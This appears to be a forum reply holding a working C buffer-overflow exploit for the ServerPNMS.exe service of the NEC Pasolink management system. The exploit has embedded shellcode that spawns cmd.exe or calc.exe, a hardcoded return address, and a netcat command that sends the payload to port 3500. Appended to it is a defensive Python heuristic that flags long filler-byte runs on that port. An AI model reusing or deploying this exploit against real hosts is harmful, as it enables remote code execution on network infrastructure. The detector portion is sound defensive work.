Excellent tutorial.
I'm leaving an exploit written in C following the tutorial, but with my own tools. That is, without Metasploit.
Regards.
-------------------------------------------------------------------------------------------------
/**
 * Remote Exploit for ServerPNMS.exe PSNM client 5.6
 * Proof of concept
 * Pasolink NEC Management System
 *
 * Developed: MrPoor <akelarregh@gmail.com>
 * Discovered by Jesusssx at http://jesusssx.wordpress.com/
 *
 * References:
 * http://jesusssx.wordpress.com/category/seguridad-aplicativa/
 * Pasolink on the NEC site: http://www.nec.com/global/prod/nw/pasolink/
 *
 * Use: gcc -o ExploitServerPNMS ExploitServerPNMS.c (Cygwin under Windows)
 *      nc 127.0.0.1 < exploit.txt
 * Spawns a cmd shell or a calc.exe on the remote host. You must specify your own shellcode!
 * See the code to change the shellcode.
 *
 * Technical details:
 *   buffer size: 524 + ret + shellcode
 *   max buffer size: unknown
 *
 * Spain
 * 20/1/2011
 * Tweaked for Windows XP SP3 Spanish. You must adjust the ret for your OS, and maybe the shellcodes.
 * Leave the script kiddies alone!
 */
#include <stdio.h>
#include <string.h>   /* strcat */

int main (int argc, char ** argv){
    int i=0;
    FILE *f;
    char buffer[1024];

    /* cmd.exe for Windows XP SP2 FR; also works on Windows XP SP3 ES. */
    char shellcode[]=
    "\x8B\xEC\x33\xFF\x57"
    "\xC6\x45\xFC\x63\xC6\x45"
    "\xFD\x6D\xC6\x45\xFE\x64"
    "\xC6\x45\xF8\x01\x8D"
    "\x45\xFC\x50\xB8\xC7\x93"
    "\xBF\x77\xFF\xD0\x00";

    /* http://www.exploit-db.com/exploits/13571/
     * By Mountassif Moad
     * Works in Windows SP3 Spanish
     * (alternative payload; not used unless you swap it in below) */
    unsigned char shellcode_calc[] =
    "\xB8\xFF\xEF\xFF\xFF\xF7\xD0\x2B\xE0\x55\x8B\xEC"
    "\x33\xFF\x57\x83\xEC\x04\xC6\x45\xF8\x63\xC6\x45"
    "\xF9\x61\xC6\x45\xFA\x6C\xC6\x45\xFB\x63\x8D\x45"
    "\xF8\x50\xBB\xC7\x93\xBF\x77\xFF\xD3";

    /* Offset of jmp esp in kernel32.dll, WinXP SP3 Spanish */
    char offset[]="\x13\x44\x87\x7C";

    (void)argc; (void)argv;
    (void)shellcode_calc;

    f=fopen("exploit.txt", "wb+");
    if (f==NULL){
        puts ("Could not create the file");
        return 1;   /* bail out instead of writing to a NULL FILE* */
    }

    /* Fill the first bytes up to the RET with 0x42 */
    for (i=0;i<523;i++){
        fprintf (f, "%c", 0x42);
    }

    /* buffer must be an empty string before strcat appends to it */
    buffer[0] = '\0';
    strcat (buffer, offset);
    strcat (buffer, shellcode);
    fprintf (f, "%s", buffer);

    printf ("Cmd shell in .\\exploit.txt\n");
    printf ("This creates a cmd.exe on the remote host! Change to your shellcode\n");
    printf ("Now: nc 127.0.0.1 3500 < exploit.txt\n");
    fclose(f);
    return 0;
}
-------------------------------------------------------------------------------------------------
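From the defender's side, the payload shape in the post above (a long run of one filler byte, then a 4-byte return address, then shellcode, sent to port 3500) is easy to spot on the wire. The following is an added example, not part of the original post or the exploit: a small Python heuristic that flags a flow to the service port whose payload contains an unusually long run of a single repeated byte. The port comes from the post's usage line; the 400-byte threshold, the port-to-service mapping and the sample payloads (placeholder address and code tails, no real shellcode) are constructed assumptions for illustration.

```python
"""Heuristic detector for overflow-style padding in a TCP payload.

Added example for this thread; not the author's code. Sample payloads below
are constructed and use placeholder bytes for the address/code tail.
"""

# Port named in the post's usage line ("nc 127.0.0.1 3500 < exploit.txt").
PORT_SERVERPNMS = 3500


def longest_byte_run(data: bytes) -> tuple[int, int]:
    """Return (byte_value, run_length) for the longest run of one repeated byte.

    Returns (-1, 0) for empty input.
    """
    best_val, best_len = -1, 0
    cur_val, cur_len = -1, 0
    for b in data:
        if b == cur_val:
            cur_len += 1
        else:
            cur_val, cur_len = b, 1
        if cur_len > best_len:
            best_val, best_len = cur_val, cur_len
    return best_val, best_len


def looks_like_overflow_payload(data: bytes, min_run: int = 400) -> bool:
    """True when a single byte repeats at least `min_run` times in a row.

    The post's payload uses 523 x 0x42 before the return address; 400 catches
    it with margin. The threshold is an assumption, not a protocol fact: tune
    it against what the service's normal traffic actually looks like.
    """
    _, run = longest_byte_run(data)
    return run >= min_run


def scan_flow(dst_port: int, payload: bytes) -> dict:
    """Classify one client->server payload; only the management port is in scope."""
    filler, run = longest_byte_run(payload)
    suspicious = dst_port == PORT_SERVERPNMS and looks_like_overflow_payload(payload)
    return {
        "port": dst_port,
        "filler_byte": filler,
        "run_length": run,
        "suspicious": suspicious,
    }


# Constructed samples (not captures). The 4-byte "address" and the 32-byte
# "code" tail are placeholders so the shape matches the post without any
# real return address or shellcode.
SAMPLE_OVERFLOW = b"\x42" * 523 + b"\xAA\xBB\xCC\xDD" + bytes(range(32))
SAMPLE_BENIGN = b"GET STATUS\r\n" + b"A" * 40


if __name__ == "__main__":
    for name, pkt in (("overflow", SAMPLE_OVERFLOW), ("benign", SAMPLE_BENIGN)):
        print(name, scan_flow(PORT_SERVERPNMS, pkt))
```

Run the file directly and it prints the verdict for both constructed samples; in practice you would feed it reassembled client-to-server payloads from a capture or an IDS hook, and a hit on the management port is a good trigger to pull the full flow for review.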